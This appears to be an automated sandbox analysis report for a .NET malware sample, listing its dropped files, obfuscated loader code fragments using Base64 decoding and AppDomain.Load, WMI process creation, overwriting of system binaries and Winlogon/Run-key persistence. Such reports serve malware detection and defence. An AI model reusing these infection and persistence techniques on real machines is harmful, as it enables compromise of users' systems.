                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Mail\System.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\System.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDirectory created: C:\Program Files\Windows Mail\27d1bcfc3c54e0
                                    Source: HaLCYOFjMN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: HaLCYOFjMN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rqbprm.exe, 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, rqbprm.exe, 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp, rqbprm.exe, 00000018.00000000.2086918365.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.pdb source: portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS._234nLbzVuExiDNZObLL22E7xwVsqGGV999AKpbmRIin,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.muGZUarLXlanrCKKJbZDMeDLtshQRpHIaMcQ3nlNZ4Z,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.wHAxPhmE2TuZ86q2i0vOsLxOqLnhz3fXBOAoBMot0JE,OCUdeBUiBo60MIibrnk7rn0PrRBLazFO7YCkt78y3yS.Fc89VNqxkSWFPgKDrSqpyhcms67VUVGqkaHUPIphq57,XNIJZHKIRB1ZVtDdGV.I4kK5OGSRLVcM6QXX6()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{dbfkZV3Ua3Gy5hYteXcioHnzE59dJEqzOO9qWXpBmG2QOFL7jGMRPnBcImEcTOLx1y77NfHOVPiK[2],XNIJZHKIRB1ZVtDdGV.XPIq0igHytXud0Hj1Q(Convert.FromBase64String(dbfkZV3Ua3Gy5hYteXcioHnzE59dJEqzOO9qWXpBmG2QOFL7jGMRPnBcImEcTOLx1y77NfHOVPiK[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    .NET source code contains potential unpacker
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: axdDR0xAkiCvl0KrBWTh4wYdtYdLie5fLnPMLVBuigySPWm2WMkPzewYELNKiSie4drRdcCfVaum System.AppDomain.Load(byte[])
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: sUd9nLAGfFoDv8kMUPJO5ZyzwFQF3wqnvaklNBZo1qSsQt5fwxLlcD2I6KFEVOGMkUQCEuFqNuGL System.AppDomain.Load(byte[])
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.cs.Net Code: sUd9nLAGfFoDv8kMUPJO5ZyzwFQF3wqnvaklNBZo1qSsQt5fwxLlcD2I6KFEVOGMkUQCEuFqNuGL
                                    Source: cnvwov.EXE.5.drStatic PE information: 0xB86EFD41 [Fri Jan 20 10:38:57 2068 UTC]
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeFile created: C:\agentwebreviewDhcp\__tmp_rar_sfx_access_check_4498921
                                    Source: rqbprm.exe.5.drStatic PE information: section name: .didat
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC33D2A5 pushad ; iretd 8_2_00007FFAAC33D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC37D2A5 pushad ; iretd 11_2_00007FFAAC37D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC562316 push 8B485F91h; iretd 11_2_00007FFAAC56231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC36D2A5 pushad ; iretd 14_2_00007FFAAC36D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC4819F2 pushad ; ret 14_2_00007FFAAC4819F9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC552316 push 8B485F92h; iretd 14_2_00007FFAAC55231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC37D2A5 pushad ; iretd 16_2_00007FFAAC37D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC562316 push 8B485F91h; iretd 16_2_00007FFAAC56231B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F640 push ecx; ret 24_2_00C7F653
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7EB78 push eax; ret 24_2_00C7EB96
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXECode function: 25_2_00007FFAAC48456C push cs; retf 25_2_00007FFAAC48456F
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXECode function: 25_2_00007FFAAC48715D push E95BDCDAh; ret 25_2_00007FFAAC487199
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeCode function: 33_2_00007FFAAC86C916 push esp; iretd 33_2_00007FFAAC86C919
                                    Source: HaLCYOFjMN.exe, n1qW0yd4NEI3jjygz3.csHigh entropy of concatenated method names: 'uddyVnktqcySyVjML7', '_7WJMLwkw7P9cu5vGDi', 'aIWhFbYhrVtWCjhohw', 'jj2Bw89A35aUj1DUc5uJCHnBQhPdQ8ynTsr4', '_1PV8hdrkBcHCEH89AQHua4CsQKHUhqNdDSpA', 'z2ShzOfBq1nO6F7c3iPO5Ig6HfNoDTuI6Q4i', 'ZppwzhVRBjv2H9fOzCHF9OBcneUnCuNCac9E', 'FtCa1bPab1rxeO7NHpRAflf3T9P0m4d5qGdG', 'ar0XMNZ4BhS0jLOo80ELl4ZUHO9GVv7XYdVf', 'Urv0XzqYP1lEUKhLhefpFCVQWYsYeu88xQC3'
                                    Source: HaLCYOFjMN.exe, scHo6wKrf0svrvCkspBVE9Yc9jDuD5HzE8QRV7PPBjy.csHigh entropy of concatenated method names: 'R2DUb4f5vXaun7j1XjMGN9eA0uFa0kD9Xfqbp2WjHjK', 'eB9G5IC5dSm2ZZcFZp8hjGXyy0Y76tSL2zrSBrswSsU', 'vV6U5J7eQWV8JUutkAyel02Gzl1AGYZVJVVc66THaBE', 'qDT5KU0sQJiYr3xfMKvjvnqffxjPd8f7pxZ2ua61lif', 'A5CvkJCDs3rkP5Exj0fD7ywmTA6qev2rSEsxuvVSGEQ', 'uLXc8GiGD9mGLVKGfNJykRvPYXIa0TrFUkjxBweGQSn', 'uZ5wJCmgY7WQM7LrB69u2XRwbnHZDYf7kvfuYXHQ4gv', '_3ranNCXwL9KoruP7bYlsy9EQtLQzjFBy8hPIXYJl4cY', 'xaCILrIoq48jFGaTbnNXRuv7ldaLdetEzfuYqGdYecK', 'dLSb9MNgKjVJKNiyqC8QM4octYxRAaqO2pS6wljF4CL'
                                    Source: HaLCYOFjMN.exe, pbjj31ML5v69tfe8VO9qOClYpMfU0hbswnd12N26eTgoQFa1WSSwAaFxbeiKuPkaLTUvOt4d89wJ.csHigh entropy of concatenated method names: 'OPVIkAzvT0sS5VE7OqRSV12i1iIaN6W0P2KeDRkGXpnqxLjymbRIL7Og3pxEXS0QPuBkYHuWBAM0', 'ULzczRrtzSleSm3BirurILhFTxTnr5PtUD1YbbpQIQyLcwnH9QsFP5lbNk7k4btQinmtPmXCo3Ek', 'tqB1XkYzXUKDpLZi5y8PUNe1dwv6YEYvx0D7o0ZhJginb4s5OOQQuQm2kqmiivsn2A0BBTv6UXWy', 'xssBXbfCe1bDOr350DKMWJuy3gjwYs4tBHBoEnAJh2P2EKIHALgvqfWtK5PCsvf2Vz4LdCMVJRHW', '_62P13vtTUSYeuuKX41Q3B2YHFcaa1XAjwxaG8n6zTFYKkmz2ozxE5PdQxHNaRfszuI4LKOwS8UAj', 'VMS6XkxGKtFMObFuouuoMcZcHAaoyExyIuxAp0HvDj8UU0GuwO9Ufb3HgHDWIbMioMZe55Qv9YOW', 'noyZ0xLFRDVbDdmojXubcqujTbwJ4tt9KZdy2nG2cXPzXDIqItTAL2Hi1CRa1wBbe9rE5hQxfAqE', '_5wTi1kCEqhYz0El5AVbOCo3pswfZOGjfgFUOXBMNw7fMsm9lbid42wEobxKAGDOLIznxywJbAOKR', '_5BAl1GYbUMcFZNuGzl6CXvY17aY7QEYSDT0VG2KK1uECrpGLOvwdU8hmAKkk1QM1Im0Nfc4j1kLV', 'FzJaUAypfEmQEYEG924LoBUBvlYJI27WxVFvW9xobilGmlY3lEHfokP2eGpXLdVwAnBEvNCW9Jc2'
                                    Source: HaLCYOFjMN.exe, ZsVsAZfjQemxyx1RtUA94adSJPc1O3v7QDQRKashCh61zRx2I890NDItDjnykdkN89XjvuGS28q3.csHigh entropy of concatenated method names: 'WTp1IQCr2eCC1caKRxx2z6OrrbNYU59BcyMZqpvvqUniIdpjnWShB9l1jbPvWx5ebkbOkXEXigzq', 'axdDR0xAkiCvl0KrBWTh4wYdtYdLie5fLnPMLVBuigySPWm2WMkPzewYELNKiSie4drRdcCfVaum', 'nhqCjXjcVACQD638rXMFlcgxHUwuNu0ljmuneLnDQmpJh2tTSmzNGj191gbhqRkF1nXxkYwWQRmt', '_8es353YQCE7EyhGJ6lvRwu2kgNDH1QMdC4gBUsPbKghy7kSzYpuLAghEpoMcKBoKxRHRlNaFnyAF', 'pb7L9QQuZAZ1wJ0ccwUtAjtf3EsMl6wgRv4mlQsEHH5U1abRXO9DLe5dHoK8F7OFdNVgFqXFb6Nv', 'S7KcdLPo9vjCJt8ox9Nhi5TzRMJe26hLdpYBoYNnv7GX6uzttThjeLoSdteli0aOYVMKISxb6Syr', '_23aIauDBm9WGcBSXBlJo04cQdVVkVSifNxOb8DuIPrPZHbiEO7H15Gy5Fs7DaqpqPWMR1pd91lzl', 'IrxCxTFDmaAVmkS3jaaDyPS69YVaw6P4cVPCLQP9dbKv1ibxFKxOfvVAH3P48xZwWmxWqlOd2Z0R', 'RvnvvV9IxNs38NPXwXIgmBXuy5hKLjsCXzZ0nLOEEgCaMLIiY7LBgUq6aHLK4hTMM0wS2iq8Yv3H', 'dLYV5VrRJobY1Ey8YTeXDWqUlF3qYP9WCciHjmlcHL3EzOl3TrctwyUbzTB2nPyTg830DjOP56Su'
                                    Source: HaLCYOFjMN.exe, ePaXnyzPUdsJsTDr3hQd6zm8fB36jjwEZf5B5PANcvBuG5uIa0Chv0uwxbiOlss9XStX88qE71ox.csHigh entropy of concatenated method names: 'VGnnAI6FINGbSttBSWzEKXysdgTDXPYFT0PtnMklD0QLVryGkZjYg7bJOfCkwsSg45YTESXCcSaJ', 'RXDTjRzny2p8HPtrk4', 'XenwmgZ9THsdpfdQ6c', '_4WDvdjTwyyBD4UDzSh', 'AmJ4rysYdqYY7zR73d'
                                    Source: HaLCYOFjMN.exe, XNIJZHKIRB1ZVtDdGV.csHigh entropy of concatenated method names: '_4aXp3oIWhKA8HBHSDm', 'hu7CB5LmHvbglCDQ3s', 'qO74f2PhpHgs1h3pzL', 'w10hYioA3ucmCp12dt', 'VYfNQK5PBCLMAsWD32', 'Dqd6cvCBOzbLscyNqR', 'Rb4kas9jC4SPGU7cJ9', 'IIdx3QmUkaq9f8R1t8', 'S2LJ1YKcygYnehkuNk', 'PmRVSDeyI8ebxaPjk1'
                                    Source: HaLCYOFjMN.exe, jVxcBivDbr6EX3HETqKeoS4yossmKRkUkR8uo0U09pn.csHigh entropy of concatenated method names: '_2DNZFjiPpPRY290nJWH4CMdPtVktjijsuGsA45QR0il', 'a41STpkzrbZWrel0pmeACq8gfvhJh0W2j9AVTZuRRka', 'VuAC3ie2vBbHGhlweQJWgvnbLoZNAfOKDzGb7FM8wj2', 'epWHcc6riR6FdQa6S2q6R73bRe83WB8ZUb7HGW3Xli7', '_1mSatoDioeHMaUgw8SZ8nNRZScCiQo2Zzk6jVbyKrYU', 'nbtfFis8meup6fQD3VT9LpkgbnegVIlXcu8g1D6h6xS', 'XawXTB84x36djWOmeCc7PxsbzSV1cevn87Uizt09iV2', '_3BVFmFPj2cVT43k5xz4nIPYmPodCsUzZmxgcsE6F3UN', 'Uq6GRVSvwQrxJeHXwEsEEiYG3XwqvdajUft1jb8aStz', 'tDTkNGctlDHHeAC8CC1lWuRnZ0Xdc9iMU8ZC2VbLfdr'
                                    Source: HaLCYOFjMN.exe, KoYQeD3DHuuDcMrQ12.csHigh entropy of concatenated method names: 'mt4yrTcZgdZvWWx2fA', '_2nRlo0lvoYhD7wYdmzOnyb63pTZloZoTfJqpI6z0538yp5ab8xg7zRpTLewmJp9q1GfcLov9ALiEtNu6vkMTqL1X4P8ZD', '_13j4W2g2H79CfkEr32i8dIPYzWMiOeK52PVVVxl4pIhSexxkJZzFLSucd4LJsByxb4Y4etcNZfsfxIhP5CHRilu5qYaPX', 'ev6OKOECtOxu4DYJU2rhZqGwv23f2ASwb0xLA9QjUUkpY5GiHkKnid0mxGKS3dmppHlLn8rpgub7dT0YCGg7r3xLZEKjo', 'AwPMlpNRMEy6O5kFCBt5DSNfLvPJyJSJSqmI4IeonyYeYQW3iUJPeYSJDnLbFbl8y0gjVOoTDteUbbgPA838i2nsEro7g'
                                    Source: HaLCYOFjMN.exe, vdzCcwYv7og1ZP060c.csHigh entropy of concatenated method names: 'coUOovyQgc7wo7nqNU', 'oPSz1CTUrJntgvva38', 'SMla61D8RIvCPt1ac9', 'Z89h7RI2pJi1uIjrOn', 'hIIaB06NeDJkMxv5ZiHIw0YWjyDhsOuSPJ3im7eEQ7ljRBXXElU1BPafZnhqOZW1GxOYoOleg4lop9WD3XYVQhc7etR93', 'ULYjMpZY1sZUOQiqXeEOgbno7D1ili3XnNuDQpGedR6HwQmMizvARHDGwUclqVkWyF8KjN0r127g4uSRmzzTZ6mFaizNd', 'dKrQGORHQk0FmmkNURl28L1UEbidAlnzUszQCWn8ICIfq3pER0o1O4y2oamnF8IMEAx2PzZAUkx73M5g68vd5dymzkEmT', '_5F2PgH3czf3JrkO2vjU1RxX3OesRIHp5hWjVAFTzlInqRYQ7mcPer6qPZZHOuWnvBaXjy7YVtPCgTDjOTMMNKCjcFJRME', 'lvb74c0t9woaSRjTclNilUDkfOq23UqKgOETAoDSRb1fNVA43M4G2rOAmFYcTbkqv21LkSjQfhTcT3XWyjfDSnBnJkDg0', 'PcwIw8RFHV9cHz4zvJYcOfrIBvfD4TBSGvjAbhRXIfFpTVfDs39CZwKfwUuGKwISNSHIA3BGItmhTDesb58seRRA2UvKc'

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\MwyHCbxj.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\gOlnWgHy.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\mGNMzMMn.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\agentwebreviewDhcp\WmiPrvSE.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\nuSUkZIl.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Roaming\Update.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeFile created: C:\agentwebreviewDhcp\portBrowserweb.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\WfRXmDCR.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\IJgIaehv.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Program Files\Windows Mail\System.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\zXoALCrI.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\hLMvsgWt.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\AppData\Roaming\Update.exe.exe (copy)Jump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Local\Temp\rqbprm.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\poUkcZma.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Local\Temp\cnvwov.EXEJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\cXuwPjHF.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\RjQGfYMX.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\yaMsqCcN.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\vphcjoRU.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\nuSUkZIl.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\IJgIaehv.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\yaMsqCcN.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\gOlnWgHy.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\WfRXmDCR.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\MwyHCbxj.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\vphcjoRU.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\mGNMzMMn.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\cXuwPjHF.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\RjQGfYMX.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\zXoALCrI.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\poUkcZma.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Users\user\Desktop\hLMvsgWt.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Creates an undocumented autostart registry key
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
